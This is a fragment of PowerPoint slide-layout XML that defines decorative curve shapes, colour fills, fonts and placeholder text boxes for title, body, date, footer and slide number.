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6/24/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200">
              <a:latin typeface="Calibri" pitchFamily="0" charset="0"/>
              <a:ea typeface="等线" pitchFamily="0" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16"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7"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8"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34992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541881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857754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319721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962178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06692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78400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51392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06872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78840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36226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22326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237133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307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4979687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51401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3763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B3B9BB"/>
              <a:srgbClr val="FFFFFF"/>
            </a:duotone>
          </a:blip>
          <a:stretch/>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:off x="150812" y="0"/>
            <a:ext cx="2436812" cy="6858000"/>
            <a:chOff x="150812" y="0"/>
            <a:chExt cx="2436812" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="0"/>
              <a:ext cx="1122362" cy="5329238"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:schemeClr val="accent1"/>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150812" y="0"/>
              <a:ext cx="1117600" cy="52768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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="595959"/>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150812" y="5238749"/>
              <a:ext cx="1228724" cy="161925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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="262626"/>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457200" y="5291137"/>
              <a:ext cx="1495424" cy="15668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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="0C5B82"/>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457200" y="5286375"/>
              <a:ext cx="2130424" cy="1571624"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="1287C2"/>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50812" y="5238749"/>
              <a:ext cx="1695450" cy="16192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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20"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1"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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="2572278" y="5883275"/>
            <a:ext cx="708417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1000" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="9732656" y="5883275"/>
            <a:ext cx="1143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1000" b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="10951855"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&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" spc="10">
              <a:solidFill>
                <a:srgbClr val="2D936B"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Trebuchet MS" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20590931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B3B9BB"/>
              <a:srgbClr val="FFFFFF"/>
            </a:duotone>
          </a:blip>
          <a:stretch/>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="70" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:off x="150812" y="0"/>
            <a:ext cx="2436812" cy="6858000"/>
            <a:chOff x="150812" y="0"/>
            <a:chExt cx="2436812" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="0"/>
              <a:ext cx="1122362" cy="5329238"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="0"/>
              <a:ext cx="1117600" cy="52768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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1228724" cy="161925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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="262626"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5291137"/>
              <a:ext cx="1495424" cy="15668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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="0C5B82"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5286375"/>
              <a:ext cx="2130424" cy="1571624"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="1287C2"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1695450" cy="16192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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="1484311" y="685800"/>
            <a:ext cx="10018713" cy="175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0" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="1484310" y="2666999"/>
            <a:ext cx="10018713" cy="31242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61" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="9732656" y="5883275"/>
            <a:ext cx="1143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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="2572278" y="5883275"/>
            <a:ext cx="708417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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="10951855" y="5867131"/>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&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" spc="1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62910514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B3B9BB"/>
              <a:srgbClr val="FFFFFF"/>
            </a:duotone>
          </a:blip>
          <a:stretch/>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="140" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:off x="150812" y="0"/>
            <a:ext cx="2436812" cy="6858000"/>
            <a:chOff x="150812" y="0"/>
            <a:chExt cx="2436812" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="134" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="0"/>
              <a:ext cx="1122362" cy="5329238"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="0"/>
              <a:ext cx="1117600" cy="52768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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="136" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1228724" cy="161925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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="262626"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5291137"/>
              <a:ext cx="1495424" cy="15668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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="0C5B82"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5286375"/>
              <a:ext cx="2130424" cy="1571624"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="1287C2"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="139" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1695450" cy="16192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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="1484311" y="685800"/>
            <a:ext cx="10018713" cy="175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31" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="9732656" y="5883275"/>
            <a:ext cx="1143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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="2572278" y="5883275"/>
            <a:ext cx="708417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Corbel" pitchFamily="0" charset="0"/>
              <a:ea typeface="华文楷体" pitchFamily="0" charset="0"/>
              <a:cs typeface="Corbel" pitchFamily="0" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="文本框"/>
          <p:cNvSpPr>
            <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
            <a:off x="10951855"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&lt;#&gt;</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" b="0" i="0" spc="1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54019362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B3B9BB"/>
              <a:srgbClr val="FFFFFF"/>
            </a:duotone>
          </a:blip>
          <a:stretch/>
        </a:blipFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="159" name="组合"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <a:off x="150812" y="0"/>
            <a:ext cx="2436812" cy="6858000"/>
            <a:chOff x="150812" y="0"/>
            <a:chExt cx="2436812" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="153" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="0"/>
              <a:ext cx="1122362" cy="5329238"/>
            </a:xfrm>
            <a:custGeom xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="0"/>
              <a:ext cx="1117600" cy="52768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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="150812" y="5238749"/>
              <a:ext cx="1228724" cy="161925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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="262626"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5291137"/>
              <a:ext cx="1495424" cy="15668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xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:srgbClr val="0C5B82"/>
            </a:solidFill>
            <a:ln xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" cmpd="sng" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="157" name="曲线"/>
            <p:cNvSpPr>
              <a:spLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" rot="0">
              <a:off x="457200" y="5286375"/>
              <a:ext cx="2130424" cy="1571624"/>
